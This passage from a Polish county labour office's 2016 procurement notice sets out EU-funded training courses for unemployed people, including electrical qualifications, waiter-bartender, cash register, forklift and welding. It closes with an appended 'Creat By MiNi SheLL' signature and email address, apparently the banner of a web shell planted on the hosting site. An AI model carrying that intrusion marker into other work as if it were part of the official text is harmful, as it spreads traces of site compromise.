5)ułożenie kostki brukowej
6)spoinowanie powierzchni ułożonej
7)wyłożenie kostki brukowej.
b)Ogólna liczba godzin szkolenia wynosi 180 z czego zajęć praktycznych min. 150 godz. 
c)Wykonawca zapewnia odzież roboczą dla każdego uczestnika szkolenia,
d)Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych.
5.Czas trwania: nie dłużej niż 30 kolejnych dni roboczych.  
6.Termin realizacji szkolenia: maj - czerwiec 2016r.  
7.Inne postanowienia
Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
a)Zaświadczenie wystawione na papierze firmowym (przekazanym przez Zamawiającego Wykonawcy  po podpisaniu umowy) zgodnie  z wymogami określonymi w § 71 ust. 4 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia 14 maja 2014 r. w sprawie szczegółowych warunków oraz trybu i sposobów prowadzenia usług rynku pracy ( Dz. U. z 2014 r. poz. 667),
b)Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiot zamówienia: przeprowadzenie szkolenia dla  10 osób  w specjalności: Uprawnienia elektryczne do 1 kV - SEP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: przeprowadzenie szkolenia dla  10 osób  w specjalności: Uprawnienia elektryczne do 1 kV - SEP
-dla 5 osób w ramach środków finansowych z Europejskiego Funduszu Społecznego , Program Operacyjny Wiedza Edukacja Rozwój, Projektu: Aktywizacja osób młodych pozostających bez pracy w powiecie chrzanowskim (II)
- 5 osób w ramach środków finansowych z Europejskiego Funduszu Społecznego Regionalnego Programu Operacyjnego, Projektu: Aktywizacja osób w wieku 30 lat i więcej pozostających bez pracy w powiecie chrzanowskim (II). 
2.  Miejsce organizacji szkolenia:  powiat chrzanowski.
W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem  wynajętym środkiem transportu zbiorowego. Koszt dowozu uczestników zostanie  wliczony do ceny szkolenia i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 w  załączniku nr 7 do SIWZ.  
3. Program szkolenia powinien obejmować 60  godzin dydaktycznych i musi być zgodny z przepisami rozporządzenia Ministra Gospodarki Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci ( Dz. U. nr 89, poz. 828 z późn. zm.) i obwieszczenia Prezesa Rady Ministrów z dnia 02 lipca 2003r. o sprostowaniu błędów ( Dz. U. nr 129, poz. 1184) oraz rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci ( Dz. U. nr 141, poz. 1189). Program Szkolenie powinien zawierać co najmniej następujące moduły:
a)Wybrane zagadnienia z elektrotechniki.
b)Zasady budowy i działania wybranych urządzeń, instalacji  i sieci elektroenergetycznych o napięciudo  1 kV.
c)Zasady eksploatacji urządzeń, instalacji i sieci elektroenergetycznych  o napięciu do 1kV.
d)Ogólne zasady racjonalnej gospodarki energetycznej.
e)Ochrona przez porażeniem prądem elektrycznym w urządzeniach  o napięciu do 1kV.
f)Postępowanie w razie awarii, porażeń prądem elektrycznym lub innego zagrożenia w urządzeniach elektroenergetycznych o napięciu do 1 kV.
g)Zajęcia praktyczne.
h)Zasady i wymagania bezpieczeństwa pracy i ochrony przeciwpożarowej oraz umiejętności udzielania pierwszej pomocy. 
Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. 
W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.
Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak ogólna liczba godzin nie może przekroczyć 60 godzin . 
4. Sposób organizacji zajęć praktycznych: 
a)Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%.  
b)Zajęcia praktyczne muszą być zgodne z przepisami rozporządzenia Ministra Gospodarki Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci ( Dz. U. nr 89, poz. 828 z późn. zm.) i obwieszczenia Prezesa Rady Ministrów z dnia 02 lipca 2003r. o sprostowaniu błędów ( Dz. U. nr 129, poz. 1184) oraz rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci ( Dz. U. nr 141, poz. 1189).
5.Czas trwania: nie dłużej niż 10 kolejnych dni roboczych
6. Termin realizacji szkolenia:  wrzesień  2016r. 
7. Inne postanowienia:
Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
a.Zaświadczenie wystawione na papierze firmowym (przekazanym przez Zamawiającego Wykonawcy po podpisaniu umowy)zgodnie z wymogami określonymi w § 71 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 maja 2014 r. w sprawie szczegółowych warunków oraz trybu i sposobów prowadzenia usług rynku pracy ( Dz. U. z 2014 r. poz. 667),
b.Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia. 
c.Ponadto każdy Uczestnik przystąpi do egzaminu przed Komisją z Urzędu Regulacji Energetyki i uzyska Świadectwo kwalifikacyjne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiot zamówienia: przeprowadzenie szkolenia dla  10  osób bezrobotnych  w specjalności:  Kelner - Barman z  językiem angielskim..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: przeprowadzenie szkolenia dla  10  osób bezrobotnych  w specjalności:  Kelner - Barman z  językiem angielskim.  
-dla 10 osób w ramach środków finansowych z Europejskiego Funduszu Społecznego , Program Operacyjny Wiedza Edukacja Rozwój, Projektu: Aktywizacja osób młodych pozostających bez pracy w powiecie chrzanowskim (II)
2. Miejsce organizacji szkolenia:  powiat chrzanowski.
W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem  wynajętym środkiem transportu zbiorowego. Koszt dowozu uczestników zostanie  wliczony do ceny szkolenia  i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 w  załączniku nr 7 do SIWZ.  
3. Program szkolenia:  musi obejmować 200 godz. dydaktycznych i obejmować co najmniej następujące moduły:
a)Charakterystyka punktów gastronomicznych  
b)Uwarunkowania związane z wymogami sanitarno-epidemiologicznymi oraz HACCP 
c)Profesjonalna obsługa klienta - 
-zasady komunikowania się z klientem i personelem 
-podstawowe zasady  obsługi konsumenta 
-psychologiczne uwarunkowania pracy z klientem
-sylwetka Kelnera-Barmana
-techniki obsługi konsumenta na sali
-towaroznawstwo i technologia żywienia/napojów
-przepisy prawne obowiązujące kelnera-barmana 
d)Obsługa kasy fiskalnej
e)Barmaństwo
f)Technika i  fizjologia mixowania napojów 
g)Propedeutyka miksologii 
h)Sprzęt barowy i  barmański 
i)Organizacja i technika pracy w cocktail barze
j)Organizacja cocktail party i innych przyjęć z alkoholem
k)Kultura spożywania napojów alkoholowych i mieszanych 
l)Język angielski - 50 godz.
Liczba godz. 200  z czego zajęć praktycznych co najmniej   150 . 
W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych do zawodu kelner-barman, dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.
Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak ogólna liczba godzin nie może przekroczyć 200 godzin . 
4. Sposób organizacji zajęć praktycznych: 
a.zajęcia praktyczne powinny  obejmować minimum 150 godzin.
b.w ramach zajęć praktycznych uczestnik powinien nabyć umiejętność przyrządzania drinków i innych napoi.
c.w ramach zajęć praktycznych uczestnik nabędzie  umiejętność obsługi klienta na sali. 
d.w ramach zajęć praktycznych uczestnik nabędzie  umiejętność obsługi kasy fiskalnej.
8.Czas trwania:  nie dłużej niż 35  kolejnych  dni roboczych 
9.Termin realizacji szkolenia:    maj -  czerwiec  2016r.
Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 
7. Inne postanowienia:
Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
a)Zaświadczenie wystawione na papierze firmowym (przekazanym przez Zamawiającego Wykonawcy po podpisaniu umowy) zgodnie z wymogami określonymi w § 71 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 maja 2014 r. w sprawie szczegółowych warunków oraz trybu i sposobów prowadzenia usług rynku pracy ( Dz. U. z 2014 r. poz. 667),
b)Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiot zamówienia: przeprowadzenie szkolenia dla 24 osób bezrobotnych w specjalności: obsługa kasy fiskalnej ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: przeprowadzenie szkolenia dla 24 osób bezrobotnych w specjalności: obsługa kasy fiskalnej . 
-14 osób w ramach środków finansowych z Europejskiego Funduszu Społecznego Regionalnego Programu Operacyjnego, Projektu: Aktywizacja osób w wieku 30 lat i więcej pozostających bez pracy w powiecie chrzanowskim (II). 
-10 osób w ramach środków Funduszu Pracy. 
2. Miejsce organizacji szkolenia:  powiat chrzanowski.
W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem  wynajętym środkiem transportu zbiorowego. Koszt dowozu uczestników zostanie  wliczony do ceny szkolenia i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 w  załączniku nr 7 do SIWZ.  
3. Program szkolenia powinien obejmować 30 godzin dydaktycznych i zawierać następujące moduły:
-Podstawowe zagadnienia z zakresu podatku VAT
-Kasa fiskalna jako element fiskalizacji w handlu i usługach, typy kas i ich działanie, materiały eksploatacyjne
-Zajęcia praktyczne
-Zasady bezpieczeństwa w obrocie produktami żywnościowymi  i przestrzegania zasad higieny w procesie produkcji
-Podstawowe zasady higieny ( HACCP )
Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. 
W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak ogólna liczba godzin nie  może przekroczyć 30. 
4. Sposób organizacji zajęć praktycznych
-zajęcia praktyczne powinny stanowić min. 50 % ogólnej liczby godzin objętych programem.  
-w ramach zajęć praktycznych uczestnik powinien nabyć umiejętność obsługi kasy fiskalnej oraz terminali płatniczych. 
-w ramach zajęć praktycznych wykonawca musi zapewnić liczbę kas fiskalnych co najmniej równą liczbie uczestników ( na jedną kasę może przypadać tylko jeden uczestnik). 
-Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych.
5. Czas trwania: nie dłużej niż 5 dni roboczych 
6.Termin realizacji szkolenia: w ramach środków Funduszu Pracy  lipiec 2016r. , w ramach środków RPO wrzesień 2016r
7.Inne postanowienia:
Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma: 
a.Zaświadczenie wystawione na papierze firmowym (przekazanym przez Zamawiającego Wykonawcy po podpisaniu umowy) zgodnie  z wymogami określonymi w § 71 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 maja 2014 r. w sprawie szczegółowych warunków oraz trybu i sposobów prowadzenia usług rynku pracy ( Dz. U. z 2014 r. poz. 667),
b.Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przedmiot zamówienia: przeprowadzenie szkolenia dla  20 osób w specjalności: Operator wózka widłowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: przeprowadzenie szkolenia dla  20 osób w specjalności: Operator wózka widłowego. 
- dla 10 osób w ramach środków finansowych z Europejskiego Funduszu Społecznego , Program Operacyjny Wiedza Edukacja Rozwój, Projektu: Aktywizacja osób młodych pozostających bez pracy w powiecie chrzanowskim (II) 
-10 osób w ramach środków finansowych z Europejskiego Funduszu Społecznego Regionalnego Programu Operacyjnego, Projektu: Aktywizacja osób w wieku 30 lat i więcej pozostających bez pracy w powiecie chrzanowskim (II). 
2.  Miejsce organizacji szkolenia: powiat chrzanowski.
W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem  wynajętym środkiem transportu zbiorowego. Koszt dowozu uczestników zostanie  wliczony do ceny szkolenia i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 w  załączniku nr 7 do SIWZ.  
3. Program szkolenia
Szkolenie powinno  być przeprowadzone  w oparciu o program opracowany lub zatwierdzony przez jednostkę organizacyjną wyznaczoną przez Ministra właściwego do spraw gospodarki zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym ( Dz. U nr 70, poz. 650 z późn. zm.)-  67 godzin.
4. Sposób organizacji zajęć praktycznych: 
a. zajęcia praktyczne mają być przeprowadzone zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym ( Dz. U nr 70, poz. 650 z późn. zm.)
b.  W  ramach zajęć praktycznych uczestnicy nabędą m.in. następujące umiejętności:
-Praktyczna nauka jazdy
-Konserwacja wózka widłowego
-Przemieszczanie masy towarowej na paletach
-Wymiana butli gazowych
c.Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. Każdy uczestnik musi mieć zapewniony indywidualny dostęp do wózka jezdniowego celem sprawnego uczestnictwa w zajęciach praktycznych.
5. Czas trwania: nie dłużej niż  10 kolejnych dni roboczych.  
6. Termin realizacji szkolenia: sierpień  - wrzesień  2016r. 
7. Inne postanowienia:
Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma:
a.Zaświadczenie  o ukończeniu szkolenia wydane na papierze firmowym ( przekazanym przez Zamawiającego Wykonawcy po podpisaniu umowy), zgodnie z wymogami określonymi w § 71 ust. 4  Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia14 maja 2014 r. w sprawie szczegółowych warunków  oraz trybu i sposobów  prowadzenia usług rynku pracy( Dz. U. z 2014 r. poz  667).
b.Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia. 
c.Ponadto w ramach szkolenia uczestnicy muszą przystąpić do egzaminu, którego celem jest uzyskanie: Zaświadczenia kwalifikacyjnego do obsługi urządzeń transportu bliskiego wystawionego przez Urząd Dozoru Technicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przedmiot zamówienia: Przeprowadzenie szkolenia  dla  15 osób  bezrobotnych w specjalności : Spawacz blach i rur spoinami pachwinowymi metodami Mag i Tig..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: Przeprowadzenie szkolenia  dla  15 osób  bezrobotnych w specjalności : Spawacz blach i rur spoinami pachwinowymi metodami Mag i Tig.  
- dla 7 osób w ramach środków finansowych z Europejskiego Funduszu Społecznego , Program Operacyjny Wiedza Edukacja Rozwój, Projektu: Aktywizacja osób młodych pozostających bez pracy w powiecie chrzanowskim (II)
- 8 osób w ramach środków finansowych z Europejskiego Funduszu Społecznego Regionalnego Programu Operacyjnego, Projektu: Aktywizacja osób w wieku 30 lat i więcej pozostających bez pracy w powiecie chrzanowskim (II). 
2.  Miejsce organizacji szkolenia:  powiat chrzanowski.
W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestników szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem wynajętym środkiem transportu zbiorowego. Koszt dowozu uczestników zostanie  wliczony do ceny szkolenia i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w pozycji  nr 9 załączniku nr 7 do SIWZ.   
3. Program szkolenia powinien obejmować 230 godzin dydaktycznych i być zgodny z wytycznymi Instytutu Spawalnictwa w Gliwicach. 
W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.
Program powinien zawierać wskazane powyżej  minimum programowe, które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak ogólna liczba godzin nie może przekroczyć 230 godzin . 
4.Sposób organizacji zajęć praktycznych;
a)zajęcia praktyczne mają być przeprowadzone zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach.
b)Wykonawca zapewnia odzież roboczą.
c)Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. Każdy uczestnik musi mieć zapewniony indywidualny dostęp do stanowiska spawalniczego celem sprawnego uczestnictwa w zajęciach praktycznych.
5. Czas trwania:  nie dłużej niż 35 kolejnych dni roboczych  
6. Termin realizacji szkolenia: wrzesień  - październik  2016r. 
Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 
7. Inne postanowienia:
Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma:
a.Zaświadczenie wystawione na papierze firmowym (przekazanym przez Zamawiającego Wykonawcy po podpisaniu umowy) zgodnie  z wymogami określonymi w § 71 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 maja 2014 r. w sprawie szczegółowych warunków oraz trybu i sposobów prowadzenia usług rynku pracy ( Dz. U. z 2014 r. poz. 667),
b.Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia. 
c.Po pozytywnym zaliczeniu egzaminu uczestnicy otrzymają także Świadectwo Egzaminu Kwalifikacyjnego Spawacza wystawionego przez Instytut Spawalnictwa oraz Książeczkę Spawacza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com